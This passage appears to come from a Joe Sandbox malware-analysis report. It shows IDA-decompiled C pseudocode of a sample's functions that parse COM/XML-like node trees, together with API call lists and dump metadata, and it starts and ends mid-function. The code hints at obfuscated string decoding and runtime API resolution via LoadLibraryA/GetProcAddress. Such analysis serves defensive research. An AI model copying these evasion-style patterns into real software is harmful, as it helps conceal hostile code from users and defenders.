    													 *((intOrPtr*)(_t206 + 0x2c)) = _t140;
    													goto L26;
    												}
    											} else {
    												E003C9090(__eflags,  &_v228, 0x76);
    												_t179 =  *0x3e8628; // 0x622508
    												_t209 = _t211 + 8;
    												_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xe0))))(_v16,  &_v228);
    												asm("sbb eax, eax");
    												 *((intOrPtr*)(_t206 + 0x18)) =  ~_t143 + 1;
    												goto L26;
    											}
    										} else {
    											E003C9090(__eflags,  &_v228, 0x76);
    											_t148 =  *0x3e8628; // 0x622508
    											_t209 = _t210 + 8;
    											_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))(_v16,  &_v228);
    											asm("sbb eax, eax");
    											 *((intOrPtr*)(_t206 + 0x14)) =  ~_t149 + 1;
    											L26:
    											_t133 = _v8;
    											_t207 =  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x40))))(_t133,  &_v20);
    											__eflags = _t207;
    											if(_t207 < 0) {
    												goto L30;
    											} else {
    												_t136 = _v8;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))(_t136);
    												_v8 = _v20;
    												_t90 = 0;
    												_v20 = 0;
    												__eflags = _t207 - 1;
    												if(_t207 != 1) {
    													continue;
    												} else {
    													_v28 = _t207;
    												}
    											}
    										}
    									}
    									goto L31;
    								}
    								goto L30;
    							}
    						}
    					}
    					L31:
    					__eflags = _t90;
    					if(_t90 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
    					}
    					_t91 = _v16;
    					__eflags = _t91;
    					if(_t91 != 0) {
    						__imp__#6(_t91);
    					}
    					_t92 = _v12;
    					__eflags = _t92;
    					if(_t92 != 0) {
    						__imp__#6(_t92);
    					}
    					_t93 = _v8;
    					__eflags = _t93;
    					if(_t93 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
    					}
    					_t94 = _v24;
    					__eflags = _t94;
    					if(_t94 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C83EC
    • SysAllocString.OLEAUT32(?), ref: 003C8541
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003C83FD
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C30C8
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C30DD
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C3240
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C324E
      • Part of subcall function 003C2220: SysFreeString.OLEAUT32(?), ref: 003C22D8
      • Part of subcall function 003C2220: SysFreeString.OLEAUT32(?), ref: 003C23DB
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C549E
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C54AF
      • Part of subcall function 003C53E0: _wtoi.MSVCRT ref: 003C55BB
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C5605
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C5613
    • SysFreeString.OLEAUT32(?), ref: 003C865C
    • SysFreeString.OLEAUT32(?), ref: 003C866A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 69%
    			E003C32C0(void* _a4, intOrPtr _a8) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v32;
    				char _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				char _v252;
    				intOrPtr* _t91;
    				intOrPtr _t94;
    				intOrPtr* _t95;
    				intOrPtr _t98;
    				intOrPtr* _t100;
    				intOrPtr* _t103;
    				intOrPtr* _t107;
    				intOrPtr _t108;
    				intOrPtr* _t110;
    				intOrPtr _t112;
    				intOrPtr* _t113;
    				void* _t116;
    				intOrPtr* _t118;
    				intOrPtr _t119;
    				intOrPtr* _t121;
    				intOrPtr _t123;
    				intOrPtr* _t124;
    				intOrPtr _t125;
    				intOrPtr* _t126;
    				intOrPtr _t134;
    				intOrPtr* _t135;
    				char _t138;
    				intOrPtr _t150;
    				intOrPtr _t156;
    				intOrPtr _t163;
    				intOrPtr* _t172;
    				intOrPtr* _t177;
    				intOrPtr _t183;
    				intOrPtr _t187;
    				intOrPtr _t188;
    				intOrPtr* _t189;
    				intOrPtr* _t194;
    
    				_t189 = _a4;
    				_push( &_v24);
    				_push(1);
    				_t138 = 0;
    				_push(_t189);
    				_v12 = 0;
    				_v24 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x38))))() >= 0) {
    					_t91 = _v24;
    					_v32 = 0;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))(_t91,  &_v32);
    					_t94 = 0;
    					__eflags = _v32;
    					if(_v32 > 0) {
    						do {
    							_t177 = _v24;
    							_t12 = _t94 + 1; // 0x1
    							_t188 = _t12;
    							_v28 = _t138;
    							_v52 = 3;
    							_t194 = _t194 - 0x10;
    							_t118 = _t194;
    							 *_t118 = _v52;
    							_t156 = _t188;
    							_v44 = _t156;
    							 *((intOrPtr*)(_t118 + 4)) = _v48;
    							 *((intOrPtr*)(_t118 + 8)) = _t156;
    							 *((intOrPtr*)(_t118 + 0xc)) = _v40;
    							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x20))))(_t177,  &_v28);
    							__imp__#9( &_v52);
    							_t138 = 0;
    							__eflags = _t119;
    							if(_t119 >= 0) {
    								_t121 = _v28;
    								_v20 = 0;
    								_t123 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x1c))))(_t121,  &_v20);
    								__eflags = _t123;
    								if(_t123 >= 0) {
    									__imp__#6(_v20);
    								}
    								_t124 = _v28;
    								_v8 = _t138;
    								_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x50))))(_t124,  &_v8);
    								__eflags = _t125;
    								if(_t125 >= 0) {
    									_t183 =  *0x3e8628; // 0x622508
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x1e0))))(_v8, _a8);
    									if(__eflags != 0) {
    										E003C9090(__eflags,  &_v252, 0x24);
    										_t163 =  *0x3e8628; // 0x622508
    										_t194 = _t194 + 8;
    										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 8))))(_v20,  &_v252);
    										__eflags = _t134;
    										if(_t134 == 0) {
    											_t44 =  &_v12;
    											 *_t44 = _v12 + 1;
    											__eflags =  *_t44;
    										} else {
    											_t135 = _a4;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x3c))))(_t135, _v20, _t138);
    										}
    									}
    									__imp__#6(_v8);
    								}
    								_t126 = _v28;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 8))))(_t126);
    							}
    							_t94 = _t188;
    							__eflags = _t94 - _v32;
    						} while (_t94 < _v32);
    						_t189 = _a4;
    					}
    					_t95 = _v24;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
    					_v16 = _t138;
    					_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x28))))(_t189, _t138,  &_v16);
    					__eflags = _t98;
    					if(_t98 < 0) {
    						goto L1;
    					} else {
    						_t100 = _v16;
    						_v36 = _t138;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x1c))))(_t100,  &_v36);
    						_t187 = 0;
    						__eflags = _v36 - _t138;
    						if(_v36 > _t138) {
    							do {
    								_t172 = _v16;
    								_a4 = _t138;
    								_v52 = 3;
    								_t194 = _t194 - 0x10;
    								_t107 = _t194;
    								 *_t107 = _v52;
    								_t187 = _t187 + 1;
    								_t150 = _t187;
    								_v44 = _t150;
    								 *((intOrPtr*)(_t107 + 4)) = _v48;
    								 *((intOrPtr*)(_t107 + 8)) = _t150;
    								 *((intOrPtr*)(_t107 + 0xc)) = _v40;
    								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x20))))(_t172,  &_a4);
    								__imp__#9( &_v52);
    								_t138 = 0;
    								__eflags = _t108;
    								if(_t108 >= 0) {
    									_t110 = _a4;
    									_v8 = 0;
    									_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x1c))))(_t110,  &_v8);
    									__eflags = _t112;
    									if(_t112 >= 0) {
    										__imp__#6(_v8);
    										_t116 = E003C32C0(_a4, _a8);
    										_t194 = _t194 + 8;
    										_t81 =  &_v12;
    										 *_t81 = _v12 + _t116;
    										__eflags =  *_t81;
    									}
    									_t113 = _a4;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
    								}
    								__eflags = _t187 - _v36;
    							} while (_t187 < _v36);
    						}
    						_t103 = _v16;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
    						return _v12;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • VariantClear.OLEAUT32(?), ref: 003C3495
    • SysFreeString.OLEAUT32(?), ref: 003C34BB
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3352
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(003C62AB), ref: 003C337C
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C33F6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 63%
    			E003C53E0(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				signed int _v20;
    				void* _v24;
    				signed int _v28;
    				char _v36;
    				signed int _v40;
    				short _v44;
    				intOrPtr _v48;
    				char _v248;
    				void* __ebx;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr* _t90;
    				intOrPtr _t94;
    				char _t95;
    				char _t96;
    				intOrPtr* _t97;
    				intOrPtr* _t99;
    				void* _t101;
    				intOrPtr* _t105;
    				void* _t110;
    				void* _t113;
    				void* _t116;
    				intOrPtr _t119;
    				void* _t122;
    				intOrPtr _t140;
    				intOrPtr _t166;
    				void* _t168;
    				intOrPtr* _t170;
    				intOrPtr* _t172;
    				void* _t173;
    				void* _t174;
    				void* _t175;
    				void* _t176;
    				void* _t177;
    
    				_t166 = __ecx;
    				_v48 = __ecx;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v40 = 0;
    				_v8 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v44 = 0;
    				E003CBB30( &_v36);
    				E003C5230(__ecx, __ecx);
    				_t170 = _a4;
    				_push( &_v44);
    				_push(_t170);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x58))))() >= 0) {
    					if(_v44 != 0xffff) {
    						L21:
    						_v28 = 1;
    						 *((intOrPtr*)(_t166 + 0x20)) = _v20;
    						 *((intOrPtr*)(_t166 + 0x28)) = _v40;
    					} else {
    						_push( &_v24);
    						_push(_t170);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x30))))() >= 0) {
    							_t90 = _v24;
    							_push( &_v20);
    							_push(_t90);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0x20))))() >= 0) {
    								_t94 = E003D1D90(_v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2, 0);
    								_t174 = _t173 + 8;
    								_v40 = _t94;
    								if(_t94 != 0) {
    									_t168 = 0;
    									if(_v20 <= 0) {
    										L20:
    										_t166 = _v48;
    										goto L21;
    									} else {
    										_t25 = _t94 + 8; // 0x8
    										_t172 = _t25;
    										while(1) {
    											_t95 = _v12;
    											if(_t95 != 0) {
    												__imp__#6(_t95);
    											}
    											_t96 = _v16;
    											_v12 = 0;
    											if(_t96 != 0) {
    												__imp__#6(_t96);
    											}
    											_t97 = _v24;
    											_push( &_v8);
    											_v16 = 0;
    											_push(_t168);
    											_push(_t97);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x1c))))() < 0) {
    												goto L22;
    											}
    											_t99 = _v8;
    											_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xa4))))(_t99,  &_v12);
    											_t187 = _t101;
    											if(_t101 >= 0) {
    												E003C9090(_t187,  &_v248, 0x7e);
    												_t140 =  *0x3e8628; // 0x622508
    												_t174 = _t174 + 8;
    												_push( &_v248);
    												_push(_v12);
    												if( *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xe0))))() != 0) {
    													L19:
    													_t105 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 8))))(_t105);
    													_t168 = _t168 + 1;
    													_t172 = _t172 + 0x18;
    													_v8 = 0;
    													if(_t168 < _v20) {
    														continue;
    													} else {
    														goto L20;
    													}
    												} else {
    													E003CB1E0(0,  &_v36);
    													_t110 = E003CA140( &_v36, _v8);
    													_t189 = _t110;
    													if(_t110 != 0) {
    														E003C9090(_t189,  &_v248, 0x27);
    														_t175 = _t174 + 8;
    														_t44 = _t172 - 8; // 0x0
    														_t113 = E003C1A10( &_v36,  &_v248, _t44);
    														_t190 = _t113;
    														if(_t113 != 0) {
    															E003C9090(_t190,  &_v248, 0x7f);
    															_t176 = _t175 + 8;
    															_t48 = _t172 - 4; // 0x4
    															_t116 = E003C1A10( &_v36,  &_v248, _t48);
    															_t191 = _t116;
    															if(_t116 != 0) {
    																E003C9090(_t191,  &_v248, 0x80);
    																_t177 = _t176 + 8;
    																_t119 = E003C1A10( &_v36,  &_v248,  &_v16);
    																if(_t119 != 0) {
    																	__imp___wtoi(_v16);
    																	_t174 = _t177 + 4;
    																	 *_t172 = _t119;
    																	 *((intOrPtr*)(_t172 + 8)) = 0;
    																	 *((intOrPtr*)(_t172 + 0xc)) = 0;
    																	goto L19;
    																}
    															}
    														}
    													}
    												}
    											}
    											goto L22;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				L22:
    				_t80 = _v12;
    				if(_t80 != 0) {
    					__imp__#6(_t80);
    				}
    				_t81 = _v16;
    				if(_t81 != 0) {
    					__imp__#6(_t81);
    				}
    				_t82 = _v8;
    				if(_t82 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))(_t82);
    				}
    				_t83 = _v24;
    				_pop(_t122);
    				if(_t83 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
    				}
    				L003C26B0(_t122,  &_v36);
    				return _v28;
    			}

    APIs
      • Part of subcall function 003C5230: SysFreeString.OLEAUT32(00000000), ref: 003C5247
      • Part of subcall function 003C5230: SysFreeString.OLEAUT32(00000001), ref: 003C5255
    • SysFreeString.OLEAUT32(?), ref: 003C549E
    • SysFreeString.OLEAUT32(?), ref: 003C54AF
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • _wtoi.MSVCRT ref: 003C55BB
    • SysFreeString.OLEAUT32(?), ref: 003C5605
    • SysFreeString.OLEAUT32(?), ref: 003C5613
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 64%
    			E003C9D50(intOrPtr __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				char _v228;
    				intOrPtr* _t59;
    				intOrPtr* _t61;
    				intOrPtr* _t62;
    				intOrPtr* _t63;
    				intOrPtr* _t64;
    				intOrPtr* _t65;
    				intOrPtr* _t69;
    				intOrPtr* _t74;
    				intOrPtr* _t75;
    				intOrPtr* _t77;
    				intOrPtr* _t78;
    				intOrPtr* _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr* _t91;
    				intOrPtr* _t92;
    				intOrPtr* _t95;
    				intOrPtr* _t99;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				intOrPtr _t109;
    				intOrPtr _t114;
    				intOrPtr _t116;
    				intOrPtr* _t130;
    				intOrPtr* _t138;
    				void* _t139;
    				void* _t140;
    				void* _t141;
    
    				_t102 = __ecx;
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				E003CD6A0(__ecx);
    				_t59 =  *((intOrPtr*)(__ecx + 4));
    				if(_t59 != 0) {
    					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xb4))))(_t59,  &_v20);
    					__eflags = _t61;
    					if(_t61 >= 0) {
    						_t69 = _v20;
    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0xa4))))(_t69,  &_v12);
    						if(__eflags >= 0) {
    							E003C9090(__eflags,  &_v228, 0x45);
    							_t109 =  *0x3e8628; // 0x622508
    							_t140 = _t139 + 8;
    							_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v12,  &_v228);
    							__eflags = _t74;
    							if(_t74 == 0) {
    								_t75 = _v20;
    								_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x34))))(_t75,  &_v8);
    								__eflags = _t77;
    								if(_t77 >= 0) {
    									__eflags = _t77 - 1;
    									if(_t77 == 1) {
    										L20:
    										_v28 = 1;
    									} else {
    										while(1) {
    											_t78 = _v12;
    											__eflags = _t78;
    											if(_t78 != 0) {
    												__imp__#6(_t78);
    											}
    											_t79 = _v16;
    											_v12 = 0;
    											__eflags = _t79;
    											if(_t79 != 0) {
    												__imp__#6(_t79);
    											}
    											_t80 = _v8;
    											_v16 = 0;
    											_t82 =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))(_t80,  &_v12);
    											__eflags = _t82;
    											if(_t82 < 0) {
    												goto L21;
    											}
    											_t83 = _v8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))(_t83,  &_v16);
    											if(__eflags >= 0) {
    												E003C9090(__eflags,  &_v228, 0x46);
    												_t114 =  *0x3e8628; // 0x622508
    												_t141 = _t140 + 8;
    												_t130 =  *((intOrPtr*)(_t114 + 0xe0));
    												__eflags =  *_t130(_v12,  &_v228);
    												if(__eflags != 0) {
    													E003C9090(__eflags,  &_v228, 0x47);
    													_t116 =  *0x3e8628; // 0x622508
    													_t140 = _t141 + 8;
    													_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0xe0))))(_v12,  &_v228);
    													__eflags = _t91;
    													if(_t91 != 0) {
    														goto L18;
    													} else {
    														_t99 = E003CBF60(_t102, _v8);
    														__eflags = _t99;
    														if(_t99 != 0) {
    															goto L18;
    														}
    													}
    												} else {
    													_t100 = _v16;
    													__imp___wtoi(_t100);
    													asm("cdq");
    													_t140 = _t141 + 4;
    													 *((intOrPtr*)(_t102 + 0x10)) = _t100;
    													 *((intOrPtr*)(_t102 + 0x14)) = _t130;
    													L18:
    													_t92 = _v8;
    													_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x40))))(_t92,  &_v24);
    													__eflags = _t138;
    													if(_t138 >= 0) {
    														_t95 = _v8;
    														 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
    														_v8 = _v24;
    														_v24 = 0;
    														__eflags = _t138 - 1;
    														if(_t138 != 1) {
    															continue;
    														} else {
    															goto L20;
    														}
    													}
    												}
    											}
    											goto L21;
    										}
    									}
    									L21:
    								}
    							}
    						}
    					}
    					_t62 = _v16;
    					__eflags = _t62;
    					if(_t62 != 0) {
    						__imp__#6(_t62);
    					}
    					_t63 = _v12;
    					__eflags = _t63;
    					if(_t63 != 0) {
    						__imp__#6(_t63);
    					}
    					_t64 = _v8;
    					__eflags = _t64;
    					if(_t64 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 8))))(_t64);
    					}
    					_t65 = _v20;
    					__eflags = _t65;
    					if(_t65 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t65 + 8))))(_t65);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C9E18
    • SysFreeString.OLEAUT32(?), ref: 003C9E29
    • _wtoi.MSVCRT ref: 003C9E95
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC049
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC05E
      • Part of subcall function 003CBF60: _wtoi.MSVCRT ref: 003CC115
      • Part of subcall function 003CBF60: rand.MSVCRT ref: 003CC160
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC2AE
      • Part of subcall function 003CBF60: SysFreeString.OLEAUT32(?), ref: 003CC2BC
    • SysFreeString.OLEAUT32(?), ref: 003C9F26
    • SysFreeString.OLEAUT32(?), ref: 003C9F34
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 65%
    			E003C28E0(intOrPtr __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v232;
    				intOrPtr* _t54;
    				intOrPtr* _t56;
    				intOrPtr* _t57;
    				intOrPtr* _t58;
    				intOrPtr* _t59;
    				intOrPtr* _t60;
    				intOrPtr* _t66;
    				intOrPtr* _t71;
    				intOrPtr* _t72;
    				intOrPtr* _t74;
    				intOrPtr* _t75;
    				intOrPtr* _t76;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t85;
    				intOrPtr* _t86;
    				intOrPtr* _t89;
    				intOrPtr _t92;
    				void* _t96;
    				intOrPtr* _t97;
    				intOrPtr _t105;
    				intOrPtr _t110;
    				intOrPtr _t127;
    				intOrPtr* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t127 = __ecx;
    				_t54 =  *((intOrPtr*)(__ecx + 4));
    				_v32 = __ecx;
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t54 != 0) {
    					_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t54 + 0xb4))))(_t54,  &_v20, _t96);
    					_t97 = __imp__#6;
    					__eflags = _t56;
    					if(_t56 >= 0) {
    						_t66 = _v20;
    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0xa4))))(_t66,  &_v12);
    						if(__eflags >= 0) {
    							E003C9090(__eflags,  &_v232, 0xa3);
    							_t105 =  *0x3e8628; // 0x622508
    							_t130 = _t129 + 8;
    							_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xe0))))(_v12,  &_v232);
    							__eflags = _t71;
    							if(_t71 == 0) {
    								_t72 = _v20;
    								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t72 + 0x34))))(_t72,  &_v8);
    								__eflags = _t74;
    								if(_t74 >= 0) {
    									__eflags = _t74 - 1;
    									if(_t74 == 1) {
    										L19:
    										_v28 = 1;
    									} else {
    										while(1) {
    											_t75 = _v12;
    											__eflags = _t75;
    											if(_t75 != 0) {
    												 *_t97(_t75);
    											}
    											_t76 = _v16;
    											__eflags = _t76;
    											if(_t76 != 0) {
    												 *_t97(_t76);
    											}
    											_t77 = _v8;
    											_v12 = 0;
    											_v16 = 0;
    											_t79 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0xa4))))(_t77,  &_v12);
    											__eflags = _t79;
    											if(_t79 < 0) {
    												goto L20;
    											}
    											_t80 = _v8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x68))))(_t80,  &_v16);
    											if(__eflags >= 0) {
    												E003C9090(__eflags,  &_v232, 0xa4);
    												_t110 =  *0x3e8628; // 0x622508
    												_t130 = _t130 + 8;
    												_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xe0))))(_v12,  &_v232);
    												__eflags = _t85;
    												if(_t85 == 0) {
    													_t92 = _v16;
    													__imp___wtoi(_t92);
    													_t130 = _t130 + 4;
    													 *((intOrPtr*)(_t127 + 0x10)) = _t92;
    												}
    												_t86 = _v8;
    												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x40))))(_t86,  &_v24);
    												__eflags = _t128;
    												if(_t128 >= 0) {
    													_t89 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
    													_v8 = _v24;
    													_v24 = 0;
    													__eflags = _t128 - 1;
    													if(_t128 != 1) {
    														_t127 = _v32;
    														continue;
    													} else {
    														goto L19;
    													}
    												}
    											}
    											goto L20;
    										}
    									}
    								}
    							}
    						}
    					}
    					L20:
    					_t57 = _v16;
    					__eflags = _t57;
    					if(_t57 != 0) {
    						 *_t97(_t57);
    					}
    					_t58 = _v12;
    					__eflags = _t58;
    					if(_t58 != 0) {
    						 *_t97(_t58);
    					}
    					_t59 = _v8;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 8))))(_t59);
    					}
    					_t60 = _v20;
    					__eflags = _t60;
    					if(_t60 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(_t60);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 26%
    			E003D43AE(intOrPtr* _a4, void* _a8, void* _a12) {
    				void* _v8;
    				void* _v12;
    				void _v32;
    				void _v148;
    				signed int _t44;
    				void* _t53;
    				void* _t63;
    				signed int _t64;
    				signed short _t77;
    				int _t79;
    				signed int _t80;
    				signed int* _t88;
    				signed int _t93;
    				void* _t95;
    				intOrPtr* _t102;
    				void* _t103;
    				void* _t108;
    				void* _t109;
    				void* _t110;
    
    				_t95 =  *0x3e8538(0x200);
    				_v12 = _t95;
    				_v8 =  *0x3e8538(0x200);
    				memset(_t95, 0, 0x1fd);
    				 *_t95 = 5;
    				if(_a12 == 0) {
    					_t44 = 0;
    				} else {
    					_t77 =  *(_a4 + 0x138) & 0x0000ffff;
    					__imp__#9(_t77);
    					_t44 = _t77 & 0x0000ffff;
    				}
    				_t108 = _a8;
    				_push(0x1fd);
    				 *(_t95 + 3) = _t44;
    				_push(_t95);
    				if(_t108 == 0) {
